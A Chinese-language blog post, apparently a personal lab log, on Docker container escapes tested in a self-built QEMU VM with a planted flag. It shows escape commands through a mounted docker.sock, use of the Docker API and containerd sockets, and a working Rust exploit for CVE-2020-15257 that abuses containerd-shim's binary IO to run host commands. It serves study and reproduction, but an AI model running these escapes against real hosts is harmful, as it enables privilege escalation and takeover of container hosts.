目录

Docker 逃逸学习

打算使用虚拟机, 于是用 buildroot 搞了一个 rootfs, 以及一个默认的内核镜像. buildroot 可以直接选上 docker-cli 和 docker-engine (docker compose 的 checksum 好像有点问题, 改一下能用了, 反正虚拟机), 他会自动选上依赖. 内核可以用它提供的, 也可以自己编译或者下载其他内核. 这里以 buildroot/board/qemu/x86_64/linux.config 为基础进行修改.

docker 需要构建镜像需要网络, qemu 加入 -device virtio-net-pci,netdev=net0 -netdev user,id=net0,hostfwd=tcp::2222-:22 选项. DHCP 网络接口名 (BR2_SYSTEM_DHCP) 设置成 eth0, 这样编译后生成的 inittab 有 dhcp 命令, 可以自动获取 ip. 还要把 ca-certificates 选上, 否则无法使用 https. 由于暂时 runc 暂时缺乏对 ramfs 的 pivot_root 支持 (见 rootfs: make pivot_root(2) dance handle initramfs case by cyphar · Pull Request #4434 · opencontainers/runc), 所以这里文件系统用 btrfs (我的机器内核没有 ext4 不好挂载修改). 此外, qmeu 的 tty 还是什么的当输出长度超过屏幕的时候并不会换行, 看输出比较困难, 于是装了一个 dropbear 来 ssh 进去 (所以上面映射了一下 22 端口).

最后目录格式如下:

text

 .
├──  buildroot
├──  playground
├──  disk.qcow2
└──  Makefile

Makefile 内容如下:

makefile

IMAGES_DIR := $(shell pwd)/buildroot/output/images
ROOT_DIR := $(shell pwd)/playground
DISK_RAW := $(shell pwd)/disk.raw
DISK := $(shell pwd)/disk.qcow2

.PHONY: all clean world menuconfig cpio

all: world

linux-menuconfig:
	$(MAKE) -C buildroot linux-menuconfig
  # TODO: auto detect config file and copy it to buildroot/.linux.config
	cp ./buildroot/output/build/linux-6.12.10/.config ./buildroot/.linux.config

disk:
	rm -f $(DISK)
	qemu-img create -f raw $(DISK_RAW) 1G
	doas losetup /dev/loop1 $(DISK_RAW)
	doas mkdir -p ./mnt/{disk,rootfs}
	doas mount -o loop $(IMAGES_DIR)/rootfs.btrfs ./mnt/rootfs/
	doas mkfs.btrfs /dev/loop1
	doas mount /dev/loop1 ./mnt/disk
	doas rsync -a ./mnt/rootfs/ ./mnt/disk/
	cd ./mnt/disk && \
		doas sed -i '$$a\root   /root    9p    trans=virtio,version=9p2000.L,rw    0    0' ./etc/fstab && \
		echo "flag{escaped}" | doas tee ./flag && \
		cd ..
	doas umount ./mnt/disk
	doas umount ./mnt/rootfs
	doas losetup -d /dev/loop1
	doas rm -r ./mnt
	qemu-img convert -f raw -O qcow2 $(DISK_RAW) $(DISK)
	rm $(DISK_RAW)

world:
	$(MAKE) -C buildroot
	$(MAKE) disk

menuconfig:
	$(MAKE) -C buildroot menuconfig

clean:
	$(MAKE) -C buildroot clean

run:
	qemu-system-x86_64 \
    -cpu qemu64,+smap \
    -m 4096M \
    -enable-kvm \
    -kernel $(IMAGES_DIR)/bzImage \
    -append "root=/dev/vda rw console=ttyS0 loglevel=3 oops=panic panic=-1" \
    -nographic \
    -no-reboot \
    -device virtio-net-pci,netdev=net0 \
    -netdev user,id=net0,hostfwd=tcp::2222-:22 \
    -virtfs local,path=$(ROOT_DIR),mount_tag=root,security_model=mapped,id=root \
    -drive file=$(DISK),format=qcow2,if=virtio,id=rootfs,index=0,media=disk

容器是一个分离的架构, docker 命令只是前端, 真正负责管理容器的是守护进程 dockerd 和 containerd. 架构如下图所示:

graph TD
    A[Docker CLI] --> B["Dokcer Engine
                        (dockerd)"]
    B --> C[containerd]
    C --> D[containerd-shim]
    D --> E[runC]
    C --> F[containerd-shim]
    F --> G[runC]
    C --> H[containerd-shim]
    H --> I[runC]

dockerd 实际调用的是 containerd 的 gRPC API, containerd 则管理容器的生命周期, 镜像, 存储, 网络等, containerd 才是容器的核型部分. 而 containerd-shim 是运行容器的载体, 每启动一个容器都会启动一个 containerd-shim 进程. 它负责使用 runC 的 API 来真正创建和运行容器.

docker run 的运行过程为:

  1. docker client 通过 gRPC 将指令传给 dockerd
  2. dockerd 请检查本机是否存在 docker 镜像文件,如果有继续往下执行, 向 host os 请求创建容器
  3. 启动 containerd-shim 进程, 创建 ns 和 cgroup
  4. containerd-shim 拿到三个参数 (容器 id, boundle 目录, 运行时二进制文件 runC) 来调用 runC 的 API
  5. runC 提取镜像文件, 生成容器配置文件, 然后启动容器
sequenceDiagram
    participant DOCKERD
    participant CONTAINERD
    participant CONTAINERD_SHIM
    participant RUNC

    DOCKERD->>CONTAINERD: GRPC 发送 REQUEST 请求
    CONTAINERD->>CONTAINERD_SHIM: 调用 SHIM 进程 start/exec
    CONTAINERD_SHIM->>RUNC: 调用 RUNC 进程 create/start/exec
    RUNC-->>CONTAINERD_SHIM: 
    CONTAINERD_SHIM-->>CONTAINERD: 
    CONTAINERD-->>DOCKERD: GRPC 发送 RESPONSE
    CONTAINERD->>RUNC: RUNC 交互: 状态、TOP 等
    RUNC-->>CONTAINERD: (我也不知道这里留空为什么会报错)

dockerd 默认绑定 unix socket /var/run/docker.sock, 用他来进行通信. 在某些容器中管理 docker 的场景, 可能会将 socket 映射进去, 这样就可以在容器里操纵主机上的容器管理了.

写一个如下的 Dockerfile 和 compose:

dockerfile

FROM alpine:latest
RUN apk add --no-cache docker curlie

yaml

services:
  app:
    build: .
    entrypoint: ["/bin/ash"]
    stdin_open: true
    tty: true
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock

然后启动该容器, 进入容器内, 和往常一样使用 docker 命令即可操作主机的 docker daemon. 所以逃逸的手法是启动一个新的容器, 并且将主机目录映射进去, 就可以拿到 flag.

text

/ # docker run -it --rm -v /:/host/ alpine ash
/ # ls
bin    etc    host   media  opt    root   sbin   sys    usr
dev    home   lib    mnt    proc   run    srv    tmp    var
/ # cd /host
/host # ls
bin           flag          linuxrc       proc          sys
crond.reboot  init          media         root          tmp
dev           lib           mnt           run           usr
etc           lib64         opt           sbin          var
/host # cat flag
flag{escaped}

不过实际上没有真的 “逃逸” 出去, ns 和 cgroup 隔离依然存在, 同时也受到 caps 限制. 不过由于可以直接使用 docker 命令, 所以在启动一个新的容器时可以进行设置, 使得容器使用主机的 ns 和 cgroup, 并且可以设置 apparmor 和 seccomp 等安全机制, 赋予更多 caps 等. 比如:

text

/ # docker run -it --rm -v /:/host/ --cap-add=ALL --security-opt apparmor=unconf
ined --security-opt seccomp=unconfined --security-opt label:disable --pid=host -
-userns=host --uts=host --cgroupns=host alpine ash
/ # ls
bin    etc    host   media  opt    root   sbin   sys    usr
dev    home   lib    mnt    proc   run    srv    tmp    var
/ # ps aux
PID   USER     TIME  COMMAND
    1 root      0:00 init
    2 root      0:00 [kthreadd]
    3 root      0:00 [pool_workqueue_]
    4 root      0:00 [kworker/R-rcu_g]
    5 root      0:00 [kworker/R-sync_]
    6 root      0:00 [kworker/R-slub_]
    7 root      0:00 [kworker/R-netns]
    10 root      0:00 [kworker/0:0H-ev]
    12 root      0:00 [kworker/R-mm_pe]
    13 root      0:00 [rcu_tasks_kthre]
    14 root      0:00 [ksoftirqd/0]
    15 root      0:00 [rcu_preempt]
    16 root      0:00 [rcu_exp_par_gp_]
    17 root      0:00 [rcu_exp_gp_kthr]
    18 root      0:00 [migration/0]
    19 root      0:00 [cpuhp/0]
    20 root      0:00 [kdevtmpfs]
    21 root      0:00 [kworker/R-inet_]
    22 root      0:00 [kauditd]
    23 root      0:00 [kworker/u4:1-ev]
    24 root      0:00 [oom_reaper]
    25 root      0:00 [kworker/R-write]
    26 root      0:00 [kcompactd0]
    27 root      0:00 [kworker/R-kbloc]
    28 root      0:00 [irq/9-acpi]
    29 root      0:00 [kworker/R-ata_s]
    30 root      0:00 [kworker/R-md]
    31 root      0:00 [kworker/R-md_bi]
    33 root      0:00 [kworker/0:1H-kb]
    34 root      0:00 [kworker/R-rpcio]
    35 root      0:00 [kworker/R-xprti]
    36 root      0:00 [kworker/R-cfg80]
    38 root      0:00 [kswapd0]
    39 root      0:00 [kworker/R-nfsio]
    40 root      0:00 [kworker/R-acpi_]
    41 root      0:00 [scsi_eh_0]
    42 root      0:00 [kworker/R-scsi_]
    43 root      0:00 [scsi_eh_1]
    44 root      0:00 [kworker/R-scsi_]
    46 root      0:00 [kworker/R-mld]
    47 root      0:00 [kworker/R-ipv6_]
    57 root      0:00 [jbd2/vda-8]
    58 root      0:00 [kworker/R-ext4-]
    73 root      0:00 /sbin/syslogd -n
    77 root      0:00 /sbin/klogd -n
    165 root      0:00 udhcpc -t1 -A3 -b -R -O search -O staticroutes -p /var/run
    170 root      0:00 /usr/sbin/crond -f
    174 root      0:00 {dockerd-syslog-} /bin/sh /usr/libexec/dockerd-syslog-wrap
    176 root      0:22 /usr/bin/dockerd --pidfile /var/run/dockerd.pid
    177 root      0:00 {dockerd-syslog-} /bin/sh /usr/libexec/dockerd-syslog-wrap
    187 root      0:05 containerd --config /var/run/docker/containerd/containerd.
    924 root      0:00 -sh
    1460 root      0:00 [kworker/0:0-eve]
    2012 root      0:00 [kworker/u4:0-ev]
    2634 root      0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id ec478
    2667 root      0:00 /bin/ash
    2696 root      0:00 docker compose run app
    2708 root      0:01 /usr/lib/docker/cli-plugins/docker-compose compose run app
    2737 root      0:02 /usr/bin/containerd-shim-runc-v2 -namespace moby -id c186f
    2771 root      0:00 /bin/ash
    2891 root      0:00 [kworker/u4:2-ev]
    2908 root      0:00 [kworker/0:1-eve]
    3047 root      0:00 [kworker/0:2-eve]
    3093 root      0:00 docker run -it --rm -v /:/host/ --cap-add=ALL --security-o
    3112 root      0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 795b7
    3144 root      0:00 ash
    3168 root      0:00 ps aux

这样就相当于获得了主机的所有权限了.

(不过更简单的方法是写 cron 反弹一个 shell 哈哈哈)

如果映射进来的 socket 不在默认位置, 可以使用 -H unix:///path/to/docker.sock 指定. (如果连名字也修改了那好像只能一个个文件试过去了.)

如果容器内没有 docker 命令也没有关系, 可以用其他方法去通信, 比如直接用 HTTP API.

text

/ # curlie --unix-socket /var/run/docker.sock GET http://localhost/containers/json
[
    {
        "Id": "6df5480c6d2ecd5ba05eee50e026e1d199560d30453a534e3b447a1ebc752bf6",
        "Names": [
            "/socket-app-run-ab55dc606bb9"
        ],
        "Image": "alpine:latest",
        "ImageID": "sha256:8a87ea05ce928fc576af504b9e838b12312274c4e39c7de784d30bc2
        "Command": "/bin/ash",
        "Created": 1736324068,
        "Ports": [

        ],
        "Labels": {
            "com.docker.compose.config-hash": "1787a2ee9fcd2a21d4a5c22008bb8da1d54c
            "com.docker.compose.container-number": "1",
            "com.docker.compose.depends_on": "",
            "com.docker.compose.image": "sha256:8a87ea05ce928fc576af504b9e838b12312
            "com.docker.compose.oneoff": "True",
            "com.docker.compose.project": "socket",
            "com.docker.compose.project.config_files": "/root/socket/docker-compose
            "com.docker.compose.project.working_dir": "/root/socket",
            "com.docker.compose.service": "app",
            "com.docker.compose.slug": "ab55dc606bb97468ca39af4bcfbabe3b54a63395d13
            "com.docker.compose.version": "2.29.7"
        },
        "State": "running",
        "Status": "Up About a minute",
        "HostConfig": {
            "NetworkMode": "socket_default"
        },
        "NetworkSettings": {
            "Networks": {
                "socket_default": {
                    "IPAMConfig": null,
                    "Links": null,
                    "Aliases": null,
                    "MacAddress": "02:42:ac:12:00:03",
                    "DriverOpts": null,
                    "NetworkID": "bb363fb6dc0ca84ea1859ec4c476f4c573008862d77378bc7
                    "EndpointID": "afa93e331bb45250fe7b5ef8931914ed2096a2c8a68c334e
                    "Gateway": "172.18.0.1",
                    "IPAddress": "172.18.0.3",
                    "IPPrefixLen": 16,
                    "IPv6Gateway": "",
                    "GlobalIPv6Address": "",
                    "GlobalIPv6PrefixLen": 0,
                    "DNSNames": null
                }
            }
        },
        "Mounts": [
            {
                "Type": "bind",
                "Source": "/var/run/docker.sock",
                "Destination": "/var/run/docker.sock",
                "Mode": "rw",
                "RW": true,
                "Propagation": "rprivate"
            }
        ]
    },
    {
        "Id": "0d217c3631c47832c8391337670d1e0915057ea2ca910de3402620c2e2acbc26",
        "Names": [
            "/socket-app-1"
        ],
        "Image": "alpine:latest",
        "ImageID": "sha256:8a87ea05ce928fc576af504b9e838b12312274c4e39c7de784d30bc2
        "Command": "/bin/ash",
        "Created": 1736324010,
        "Ports": [

        ],
        "Labels": {
            "com.docker.compose.config-hash": "07f59ca7fad1bdad505feb0e11fdd72aa356
            "com.docker.compose.container-number": "1",
            "com.docker.compose.depends_on": "",
            "com.docker.compose.image": "sha256:8a87ea05ce928fc576af504b9e838b12312
            "com.docker.compose.oneoff": "False",
            "com.docker.compose.project": "socket",
            "com.docker.compose.project.config_files": "/root/socket/docker-compose
            "com.docker.compose.project.working_dir": "/root/socket",
            "com.docker.compose.service": "app",
            "com.docker.compose.version": "2.29.7"
        },
        "State": "running",
        "Status": "Up About a minute",
        "HostConfig": {
            "NetworkMode": "socket_default"
        },
        "NetworkSettings": {
            "Networks": {
                "socket_default": {
                    "IPAMConfig": null,
                    "Links": null,
                    "Aliases": null,
                    "MacAddress": "02:42:ac:12:00:02",
                    "DriverOpts": null,
                    "NetworkID": "bb363fb6dc0ca84ea1859ec4c476f4c573008862d77378bc7
                    "EndpointID": "fdda29be5bab686b462f722fa82413c9a8aafb8457c2616c
                    "Gateway": "172.18.0.1",
                    "IPAddress": "172.18.0.2",
                    "IPPrefixLen": 16,
                    "IPv6Gateway": "",
                    "GlobalIPv6Address": "",
                    "GlobalIPv6PrefixLen": 0,
                    "DNSNames": null
                }
            }
        },
        "Mounts": [
            {
                "Type": "bind",
                "Source": "/var/run/docker.sock",
                "Destination": "/var/run/docker.sock",
                "Mode": "rw",
                "RW": true,
                "Propagation": "rprivate"
            }
        ]
    }
]
HTTP/1.1 200 OK
Api-Version: 1.47
Content-Type: application/json
Docker-Experimental: false
Ostype: linux
Server: Docker/27.3.1 (linux)
Date: Wed, 08 Jan 2025 08:16:16 GMT
Transfer-Encoding: chunked

更多的操作可以对着 API 文档看, 就不试怎么启动容器什么的了.

在 systemd 启动的 docker 中, 还会将 docker.sock 绑定到 2375 (不加密) 和 2376 (tls) 端口, 如果容器能够访问主机网络 (-net=host), 或者主机直接暴露到公网, 可以通过这个端口来操作, docker 命令的话和上面的类似, -H tcp://host:2376 即可连接.

如果有映射进 containerd.sock, 也可以直接和他交互来创建容器进行逃逸. 可以使用 containerd 命令行 ctr, 也可以用其他工具比如更加友好的 nerdctl, 甚至可以自己写 gRPC 调用.

compose 如下:

yml

services:
  containerd:
    build: .
    entrypoint: ["/bin/ash"]
    stdin_open: true
    tty: true
    cap_add:
      - SYS_ADMIN
    network_mode: host
    volumes:
      - /var/run/docker/containerd/containerd.sock:/var/run/docker/containerd/containerd.sock
      - /var/lib/docker/containerd:/var/lib/docker/containerd

不过 docker 并不使用 contrainerd 存储容器 (参考), 所以 nerdctl 无法查看到 images. container 还是能够看到的, 不过在独立的 namespace 里:

text

/ # nerdctl -a /var/run/docker/containerd/containerd.sock namespace ls
NAME       CONTAINERS    IMAGES    VOLUMES    LABELS
default    0             0         0
moby       1             0         0
/ # nerdctl -a /var/run/docker/containerd/containerd.sock -n moby ps
CONTAINER ID    IMAGE    COMMAND       CREATED           STATUS    PORTS    NAMES
50ed2f6cabbf             "/bin/ash"    16 minutes ago    Up
/ # docker ps
CONTAINER ID   IMAGE        COMMAND      CREATED          STATUS          PORTS     NAMES
50ed2f6cabbf   socket-app   "/bin/ash"   16 minutes ago   Up 16 minutes             socket-app-run-5e4ecb87c5a0

可以成功拉取镜像, 但是创建容器还是会出现问题:

text

FATA[0000] failed to mount {Type:bind Source:/var/lib/docker/containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/4/fs Target: Options:[ro rbind]} on "/tmp/initialC2772891160": operation not permitted

这里需要给 mount 权限 (SYS_ADMIN capability), 并且将 /var/lib/docker/contaienrd/ 也映射进容器. (不懂为什么主机的 containerd 不在主机上找位置)

结果还是出现了问题:

text

FATA[0000] failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: failed to fulfil mount request: open /var/lib/nerdctl/55e780ce/containers/default/d832666b196df5a9dd64bd38453d590aa5e7b7464249e7092a41d665f55584b9/resolv.conf: no such file or directory: unknown

换成 ctr, 创建容器并启动:

text

/ # ctr -a /var/run/docker/containerd/containerd.sock container create --runtime io.containerd.runc.v2 --mount type=bind,source=/,destination=/host docker.io/library/alpine:latest test /bin/ash
/ # ctr -a /var/run/docker/containerd/containerd.sock task start test
ctr: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: error jailing process inside rootfs: pivot_root .: invalid argument: unknown

不能 pivot_root, 和 docker 一样的原因, 因为是 ramfs. 启动的时候带一个参数 –no-pivot:

text

/ # ctr -a /var/run/docker/containerd/containerd.sock task start --no-pivot test
ctr: failed to create shim task: failed to open stdin fifo /run/containerd/fifo/533476447/test-stdin: stat /run/containerd/fifo/533476447/test-stdin: no such file or directory: unknown

结果又无法操作 fifo 了. 这里倒是找到一个 wp 绕过了这个问题:

引用
Next step was to try and create a privileged container. I stumbled a little, with an error about docker-containerd-ctr not being able to create a fifo directory. This could have been because of the container-in-container situation, my initial shell being TTY-less or Bitbucket’s hijack of stdio. This was an easy issue to solve though, simply by passing the –null-io parameter the error went away. Because I couldn’t create an interactive container, I had to go with a reverse shell. The easiest here was to create a shell script, that got mounted into the container and then executed.

即不使用 stdin 交互而是弹一个 shell.

又出问题啦, 创建的时候可以 mount, 但是 task start 的时候报错, 不知道怎么解决了.

text

ctr: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: error mounting "/" to rootfs at "/host": mount src=/, dst=/host, dstFd=/proc/thread-self/fd/8: no such device: unknown

(人麻了, 开了个新机器只启动 containerd 也报这个错, 能搜到的接近的 issue 是 这个 但是他说不是 containerd 或者 runc 的问题)

暂时歇了, 能够控制其他容器也是一种逃逸 (确信)

有个 CVE-2020-15257 containerd-shim API exposed to host network containers · Advisory · containerd/containerd 和它相关. 这个漏洞是在旧版本的 containerd 中, 由于在 –net host 模式下, 容器与 host 共享一套 Network namespaces, 没有限制对抽象 Unix socket 的访问. 抽象 socket 并不受到 mount namespace 的隔离. 官方的修复方案是把原本的抽象 socket 替换成文件 socket, 这样这个 socket 就会受到 mount namespace 的隔离.

这里将 containerd-shim.sock 映射进容器来复现, compose 如下:

yml

services:
  shim:
    imae: alpine:latest
    entrypoint: ["/bin/ash"]
    stdin_open: true
    tty: true
    volumes:
      - /var/run/containerd/s/:var/run/containerd/s/

首先需要学习一下 containerd-shim 的交互方式. 使用 gRPC 与 shim 通信, API 如下:

proto

service Task {
	rpc State(StateRequest) returns (StateResponse);
	rpc Create(CreateTaskRequest) returns (CreateTaskResponse);
	rpc Start(StartRequest) returns (StartResponse);
	rpc Delete(DeleteRequest) returns (DeleteResponse);
	rpc Pids(PidsRequest) returns (PidsResponse);
	rpc Pause(PauseRequest) returns (google.protobuf.Empty);
	rpc Resume(ResumeRequest) returns (google.protobuf.Empty);
	rpc Checkpoint(CheckpointTaskRequest) returns (google.protobuf.Empty);
	rpc Kill(KillRequest) returns (google.protobuf.Empty);
	rpc Exec(ExecProcessRequest) returns (google.protobuf.Empty);
	rpc ResizePty(ResizePtyRequest) returns (google.protobuf.Empty);
	rpc CloseIO(CloseIORequest) returns (google.protobuf.Empty);
	rpc Update(UpdateTaskRequest) returns (google.protobuf.Empty);
	rpc Wait(WaitRequest) returns (WaitResponse);
	rpc Stats(StatsRequest) returns (StatsResponse);
	rpc Connect(ConnectRequest) returns (ConnectResponse);
	rpc Shutdown(ShutdownRequest) returns (google.protobuf.Empty);
}

可以使用 Pids 来测试一下. 官方提供了 go 语言的客户端 API, 不会写 go, 这里用 rust 来写.

PidsRequest 需要传入 id, 这里传入的是容器的 id (测试出来的, 应该是 docker 是这么组织管理的, 自己用 ctr 应该可以起不同的 id). 在容器里可以直接 cat /proc/self/cgroup 看到, 比如:

text

/ # cat /proc/self/cgroup
13:debug:/
12:misc:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
11:rdma:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
10:pids:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
9:hugetlb:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
8:net_prio:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
7:perf_event:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
6:net_cls:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
5:freezer:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
4:devices:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
3:blkio:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
2:cpuacct:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
1:cpu:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071

rust

use std::fs;

use containerd_shim_protos::{
    api::PidsRequest,
    ttrpc::context::{self, Context},
    Client, TaskClient,
};

fn find_shim_sockets() -> Vec<String> {
    fs::read_dir("/run/containerd/s/")
        .expect("Failed to read /run/containerd/s/")
        .filter_map(|entry| entry.ok())
        .map(|entry| entry.path().to_string_lossy().to_string())
        .collect()
}

fn get_container_id() -> Result<String, std::io::Error> {
    let cgroup = fs::read_to_string("/proc/1/cgroup").expect("Failed to read /proc/1/cgroup");
    for line in cgroup.lines() {
        if line.contains("docker") {
            let parts: Vec<&str> = line.split('/').collect();
            return parts
                .last()
                .map(|s| s.to_string())
                .ok_or(std::io::Error::new(
                    std::io::ErrorKind::NotFound, line));
        }
    }
    Err(std::io::Error::new(std::io::ErrorKind::NotFound, cgroup))
}

fn main() {
    for socket in find_shim_sockets() {
        let sockaddr = format!("unix://{socket}");
        println!("connecting to {}", sockaddr);
        let client = Client::connect(&sockaddr).expect("Failed to connect to shim");
        let task = TaskClient::new(client);
        println!("requesting pids for {}", socket);
        let container_id = get_container_id().expect("Failed to get container id");
        let mut pids_req = PidsRequest::new();
        pids_req.set_id(container_id);
        let pids_resp = task
            .pids(context::with_timeout(0), &pids_req)
            .expect("Failed to get pids");
        println!("pids: {:#?}", pids_resp);
    }
}

结果如下:

text

connecting to unix:///run/containerd/s/ddb23e1e1b639b0cc4a313a92f318ccbc7c0ef9c4b77bbe99a806b523172733c
requesting pids for /run/containerd/s/ddb23e1e1b639b0cc4a313a92f318ccbc7c0ef9c4b77bbe99a806b523172733c
pids: PidsResponse {
    processes: [
        ProcessInfo {
            pid: 682,
            info: MessageField(
                None,
            ),
            special_fields: SpecialFields {
                unknown_fields: UnknownFields {
                    fields: None,
                },
                cached_size: CachedSize {
                    size: 0,
                },
            },
        },
        ProcessInfo {
            pid: 939,
            info: MessageField(
                None,
            ),
            special_fields: SpecialFields {
                unknown_fields: UnknownFields {
                    fields: None,
                },
                cached_size: CachedSize {
                    size: 0,
                },
            },
        },
    ],
    special_fields: SpecialFields {
        unknown_fields: UnknownFields {
            fields: None,
        },
        cached_size: CachedSize {
            size: 0,
        },
    },
}

成功连上 host 的 shim socket 并且通信. 在主机上可以看到, 上面的 682 是 docker 中的进程 (这里启动的是 ash), 其父进程是 containerd-shim:

text

# ps -o pid,ppid,args | grep -E "PID|$(ps -o pid,ppid,args | grep 682 | head -n -1 | awk '{print $2}')"
PID   PPID  COMMAND
    650     1 /usr/bin/containerd-shim-runc-v2 -namespace moby -id c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071 -address /var/run/docker/containerd/containerd.sock
    682   650 /bin/ash

接下来考虑利用. 在运行一个 task 时, 有两个地方可以直接执行主机命令. 一个是 IO 可以指定成程序, 另一个是设置 hooks 运行程序.

containerd 支持将 IO 设置成二进制程序, 来做到类似重定向的效果. 比如可以将容器的输出记录到日志程序如 journald 中. 相关代码 如下:

go

// BinaryIO forwards container STDOUT|STDERR directly to a logging binary
func BinaryIO(binary string, args map[string]string) Creator {
	return func(_ string) (IO, error) {
		uri, err := LogURIGenerator("binary", binary, args)
		if err != nil {
			return nil, err
		}

		res := uri.String()
		return &logURI{
			config: Config{
				Stdout: res,
				Stderr: res,
			},
		}, nil
	}
}

所以可以创建一个 task, 并且设置其 stdout 为 binaryio, 这样就可以在主机上执行任意命令了, 比如反弹 shell.

先来看看创建 task 需要的参数:

proto

message CreateTaskRequest {
	string id = 1;
	string bundle = 2;
	repeated containerd.types.Mount rootfs = 3;
	bool terminal = 4;
	string stdin = 5;
	string stdout = 6;
	string stderr = 7;
	string checkpoint = 8;
	string parent_checkpoint = 9;
	google.protobuf.Any options = 10;
}

根据 OCI, id, bundle 是必要的, id 则是上面说到的那个 id, bundle 则是容器的配置文件, 符合 OCI 标准. 其他留空的话会按 bundle 设置的来. id 可以自行设置. bundle 如果直接用 docker 启动时设置的 (/run/docker/containerd/daemon/io.containerd.runtime.v2.task/moby/{container_id}/config.json) 目前版本会出现如下报错:

text

Failed to create task: RpcStatus(Status { code: UNKNOWN, message: "OCI runtime create failed: runc create failed: container's cgroup is not empty: 2 process(es) found", details: [], special_fields: SpecialFields { unknown_fields: UnknownFields { fields: None }, cached_size: CachedSize { size: 0 } } })

说是 cgroup 不为空, 所以还得自己设置. 主机是可以访问容器的文件系统的, 所以可以在容器文件系统中写一个 bundle 文件. 具体来说, docker 默认使用 overlayfs, 在容器中查看 /etc/mtab 即可查看 rootfs 映射, 比如:

text

overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/OZM73XA67KI3RI5ZIOLNDRSAYH:/var/lib/docker/overlay2/l/CFJLUZAW4E44SPONRAFFOYETHV:/var/lib/docker/overlay2/l/UKJT4TRNQILRFI44Y4LLNH7BOK,upperdir=/var/lib/docker/overlay2/42e61d37a5c08ecbb4a9fc4385d4f0cbec3cddb6f5e1e9959a92e02d409a22c8/diff,workdir=/var/lib/docker/overlay2/42e61d37a5c08ecbb4a9fc4385d4f0cbec3cddb6f5e1e9959a92e02d409a22c8/work 0 0

overlayfs 分层, 这里访问 /var/lib/docker/overlay2/{overlay_id}/merged 即可访问到容器的 rootfs. 或者用 diff 也行, diff 会存新加/修改的.

将已有容器的 config.json 拿出来修改, 把 container id 和 root path 修改正确, 把 cgroupPath 写成别的什么路径, 最后写入比如容器中的 /tmp/config.json 里, 这样主机上的 bundle 路径应该是 /var/lib/docker/overlay2/{overlay_id}/merged/tmp/.

不出意外的话就要出意外了, 报错:

text

Failed to create task: RpcStatus(Status { code: UNKNOWN, message: "OCI runtime create failed: runc create failed: cannot allocate tty if runc will detach without setting console socket", details: [], special_fields: SpecialFields { unknown_fields: UnknownFields { fields: None }, cached_size: CachedSize { size: 0 } } })

这里需要把请求中 terminal 选项写成 true, 就不会认为是 detach, 不用创建 socket.

这里使用主机上的 docker cp 把 /flag 拷贝进来打. exp 如下:

rust

use std::{fs, path::Path};

use containerd_shim_protos::{
    api::{CreateTaskRequest, CreateTaskResponse, PidsRequest, PidsResponse},
    protobuf::{self, Message, MessageDyn},
    shim::oci::Options,
    ttrpc::context::{self, Context},
    Client, TaskClient,
};

fn find_shim_sockets() -> Vec<String> {
    fs::read_dir("/run/containerd/s/")
        .expect("Failed to read /run/containerd/s/")
        .filter_map(|entry| entry.ok())
        .map(|entry| entry.path().to_string_lossy().to_string())
        .collect()
}

fn get_container_id() -> String {
    let cgroup = fs::read_to_string("/proc/1/cgroup").expect("Failed to read /proc/1/cgroup");
    for line in cgroup.lines() {
        if line.contains("docker") {
            let parts: Vec<&str> = line.split('/').collect();
            return parts
                .last()
                .expect("Failed to get last part of cgroup line")
                .to_string();
        }
    }
    panic!("Failed to find container id in /proc/1/cgroup: {}", cgroup);
}

fn get_overlayfs() -> String {
    fs::read_to_string("/etc/mtab")
        .expect("Failed to read /etc/mtab")
        .lines()
        .next()
        .expect("Failed to get first line of /etc/mtab")
        .split(',')
        .find(|part| part.contains("workdir="))
        .expect("Failed to find overlayfs workdir")
        .split_whitespace()
        .next()
        .expect("Failed to get overlayfs workdir")
        .split('=')
        .last()
        .expect("Failed to get overlayfs workdir")
        .replace("work", "merged")
}

fn get_overlay_id() -> String {
    let overlay_path = get_overlayfs();
    overlay_path
        .split('/')
        .nth_back(1)
        .expect("Failed to get last part of overlayfs path")
        .to_string()
}

fn main() {
    for socket in find_shim_sockets() {
        let sockaddr = format!("unix://{socket}");
        println!("connecting to {}", sockaddr);
        let client = Client::connect(&sockaddr).expect("Failed to connect to shim");
        let task = TaskClient::new(client);
        let create_resp = create_task_request(&task);
        println!("created task: {:#?}", create_resp);
    }
}

fn set_bundle<P: AsRef<Path>, Q: AsRef<Path>>(overlayfs_path: P, inner_path: Q) -> String {
    let config_template = include_str!("config.json");
    let config = config_template
        .replace("{{OVERLAY_ID}}", &get_overlay_id())
        .replace("{{CONTAINER_ID}}", &get_container_id());
    let config_path = Path::new("/").join(&inner_path).join("config.json");
    fs::write(&config_path, config)
        .unwrap_or_else(|_| panic!("Failed to write {}", config_path.display()));
    let bundle_path = overlayfs_path.as_ref().join(inner_path);
    bundle_path.to_string_lossy().into_owned()
}

fn create_task_request(task: &TaskClient) -> CreateTaskResponse {
    let mut create_req = CreateTaskRequest::new();
    create_req.set_id("PwnedByWings".to_string());
    create_req.set_terminal(true);
    let bundle_path = set_bundle(get_overlayfs(), "tmp/");
    create_req.set_bundle(bundle_path);
    let command = format!("docker cp /flag {}:/", get_container_id());
    let command = command.replace(" ", "%20");
    let payload = format!("binary:///bin/sh?-c={command}");
    create_req.set_stdout(payload);
    task.create(context::with_timeout(0), &create_req)
        .expect("Failed to create task")
}

结果如下:

text

/ # ls
